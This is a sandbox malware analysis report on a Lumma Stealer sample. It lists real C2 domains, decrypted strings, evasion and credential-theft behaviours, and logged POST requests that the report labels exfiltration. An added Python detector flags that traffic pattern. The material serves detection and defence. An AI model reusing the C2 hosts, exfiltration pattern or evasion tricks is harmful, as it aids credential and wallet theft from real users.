
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1543431
MD5: 05b1942e139d61a022f421bdd45a33bb
SHA1: 94b79e3e26b7ee47e8931720db0503e01d1b6070
SHA256: f75e3f83ef5ddb3809cbef6aab8ba643f1570564aceafdd7a99dcdc11d7e89c7
Tags: exe, user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 5536 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 05B1942E139D61A022F421BDD45A33BB)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["founpiuer.store", "thumbystriw.store", "crisiwarny.store", "necklacedmny.store", "fadehairucw.store", "scriptyprefej.store", "navygenerayk.store", "presticitpo.store"], "Build id": "4SD0y4--legendaryy"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.2225779181.0000000001068000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2208047140.0000000001062000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2182520412.0000000001061000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2223528607.0000000001063000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2207678543.0000000001061000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
              No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-27T21:06:18.315174+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 104.21.95.91 | 443 | TCP
2024-10-27T21:06:19.528364+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 104.21.95.91 | 443 | TCP
2024-10-27T21:06:18.315174+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 104.21.95.91 | 443 | TCP
2024-10-27T21:06:19.528364+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 104.21.95.91 | 443 | TCP
2024-10-27T21:06:20.828100+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49706 | 104.21.95.91 | 443 | TCP


              AV Detection

Source: file.exe | Avira: detected
Source: file.exe.5536.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["founpiuer.store", "thumbystriw.store", "crisiwarny.store", "necklacedmny.store", "fadehairucw.store", "scriptyprefej.store", "navygenerayk.store", "presticitpo.store"], "Build id": "4SD0y4--legendaryy"}
Source: file.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String decryptor: scriptyprefej.store
Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String decryptor: navygenerayk.store
Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String decryptor: founpiuer.store
Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String decryptor: necklacedmny.store
Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String decryptor: thumbystriw.store
Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String decryptor: fadehairucw.store
Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crisiwarny.store
Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String decryptor: presticitpo.store
Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 4SD0y4--legendaryy
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49733 version: TLS 1.2

              Networking

Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49706 -> 104.21.95.91:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.95.91:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.95.91:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.95.91:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.95.91:443
Source: Malware configuration extractor | URLs: founpiuer.store
Source: Malware configuration extractor | URLs: thumbystriw.store
Source: Malware configuration extractor | URLs: crisiwarny.store
Source: Malware configuration extractor | URLs: necklacedmny.store
Source: Malware configuration extractor | URLs: fadehairucw.store
Source: Malware configuration extractor | URLs: scriptyprefej.store
Source: Malware configuration extractor | URLs: navygenerayk.store
Source: Malware configuration extractor | URLs: presticitpo.store
Source: Joe Sandbox View | IP Address: 104.21.95.91
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 52 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12840 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15082 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20572 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1258 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 569007 | Host: crisiwarny.store
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: presticitpo.store
Source: global traffic | DNS traffic detected: DNS query: crisiwarny.store
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: crisiwarny.store
Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000002.2277734685.0000000001008000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269401849.0000000001007000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2238064199.0000000001085000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/
Source: file.exe, 00000000.00000002.2277498147.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/=
Source: file.exe, 00000000.00000002.2277498147.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/_y
Source: file.exe, 00000000.00000003.2251179083.000000000108B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/api
Source: file.exe, 00000000.00000002.2277964213.000000000107D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/apiFT
Source: file.exe, 00000000.00000003.2194155395.0000000001061000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/apie
Source: file.exe, 00000000.00000003.2238094568.0000000001083000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/apifeM
Source: file.exe, 00000000.00000002.2277987160.0000000001083000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/apii
Source: file.exe, 00000000.00000003.2223528607.0000000001063000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/apila
Source: file.exe, 00000000.00000003.2223402187.00000000057A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/apiz
Source: file.exe, 00000000.00000002.2277498147.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/o
Source: file.exe, 00000000.00000002.2277498147.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/p
Source: file.exe, 00000000.00000002.2277987160.000000000108B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269328476.000000000108B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/roxy-Authenticat
Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
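The POST sequence above is the network observable worth building detection on: two small application/x-www-form-urlencoded POSTs to /api (8 and 52 bytes), followed by multipart/form-data POSTs of 12 KB to 569 KB to the same host. Note that this build sent a Chrome 119 User-Agent rather than the "TeslaBrowser/5.5" string the Malpedia entry documents (that string survives only in the decrypted-string list), so a rule keyed on the User-Agent alone would have missed this traffic. The block below is an added example and not part of the Joe Sandbox report: it scores constructed, tab-separated HTTP log lines (the layout, the field names and the 64-byte / 1 KB size cut-offs are assumptions of the example, not any product's format or any published rule) against that check-in-then-upload sequence and the C2 list the configuration extractor recovered.

```python
from collections import defaultdict

# C2 domains exactly as the report's configuration extractor recovered them.
LUMMA_C2 = {
    "founpiuer.store", "thumbystriw.store", "crisiwarny.store", "necklacedmny.store",
    "fadehairucw.store", "scriptyprefej.store", "navygenerayk.store", "presticitpo.store",
}
# The user agent Malpedia documents for Lumma, and the Chrome string this sample sent.
LEGACY_UA = "TeslaBrowser/5.5"
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
HIGH_CONFIDENCE = {"config_c2_match", "checkin_then_exfil", "legacy_tesla_ua"}

# Constructed log layout (an assumption for this example, not any tool's native format):
# epoch<TAB>src_ip<TAB>method<TAB>host<TAB>uri<TAB>content_type<TAB>length<TAB>user_agent
SAMPLE_LOG = "\n".join([
    "# constructed sample; sizes and timing mirror the POST sequence in the report above",
    f"1730059578.3\t192.168.2.5\tPOST\tcrisiwarny.store\t/api\tapplication/x-www-form-urlencoded\t8\t{CHROME_UA}",
    f"1730059579.5\t192.168.2.5\tPOST\tcrisiwarny.store\t/api\tapplication/x-www-form-urlencoded\t52\t{CHROME_UA}",
    f"1730059580.8\t192.168.2.5\tPOST\tcrisiwarny.store\t/api\tmultipart/form-data; boundary=be85de5ipdocierre1\t12840\t{CHROME_UA}",
    f"1730059584.1\t192.168.2.5\tPOST\tcrisiwarny.store\t/api\tmultipart/form-data; boundary=be85de5ipdocierre1\t569007\t{CHROME_UA}",
    f"1730059590.0\t192.168.2.5\tGET\twww.google.com\t/\t-\t0\t{CHROME_UA}",
    f"1730059591.0\t192.168.2.7\tPOST\tapi.example.org\t/api\tapplication/x-www-form-urlencoded\t40\t{CHROME_UA}",
])


def parse_line(line):
    ts, src, method, host, uri, ctype, length, ua = line.split("\t")
    return {"ts": float(ts), "src": src, "method": method, "host": host.lower(),
            "uri": uri, "ctype": ctype.lower(), "len": int(length), "ua": ua}


def tag_record(r):
    """Per-request indicators drawn from the observables in this report."""
    tags = set()
    if r["host"] in LUMMA_C2:
        tags.add("config_c2_match")
    if r["ua"] == LEGACY_UA:
        tags.add("legacy_tesla_ua")
    if r["method"] == "POST" and r["uri"] == "/api":
        if r["ctype"].startswith("application/x-www-form-urlencoded") and r["len"] <= 64:
            tags.add("small_form_post")    # sized like the 8- and 52-byte check-ins above
        elif r["ctype"].startswith("multipart/form-data") and r["len"] >= 1024:
            tags.add("multipart_upload")   # sized like the 12 KB to 569 KB uploads above
    return tags


def score_flows(lines, window=120.0):
    """Group requests by (src, host) and add 'checkin_then_exfil' when a small
    form POST to /api is followed within `window` seconds by a multipart POST
    to the same host: the sequence identifies the stealer whatever User-Agent
    string a given build spoofs."""
    per_pair = defaultdict(list)
    for line in lines:
        if line.strip() and not line.startswith("#"):
            r = parse_line(line)
            per_pair[(r["src"], r["host"])].append((r["ts"], tag_record(r)))
    results = {}
    for pair, events in per_pair.items():
        tags, last_checkin = set(), None
        for ts, t in sorted(events, key=lambda e: e[0]):
            tags |= t
            if "small_form_post" in t:
                last_checkin = ts
            elif "multipart_upload" in t and last_checkin is not None and ts - last_checkin <= window:
                tags.add("checkin_then_exfil")
        results[pair] = sorted(tags)
    return results


def alerts(lines):
    """Only pairs carrying a high-confidence tag: one small POST to /api on
    an unrelated API host is not enough on its own."""
    return {pair: tags for pair, tags in score_flows(lines).items()
            if HIGH_CONFIDENCE & set(tags)}


if __name__ == "__main__":
    for pair, tags in alerts(SAMPLE_LOG.splitlines()).items():
        print(pair, tags)
```

Feeding the constructed log through alerts() returns only the 192.168.2.5 to crisiwarny.store pair, tagged both by the configuration-derived domain match and by the check-in-then-upload sequence; the second tag is the one that still fires when the actor rotates to a domain the extractor has not seen.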

              System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0106B5FE
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: ZLIB complexity 0.998114224137931
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000003.2194529804.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057A5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182838419.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2194888793.00000000057B7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe | ReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
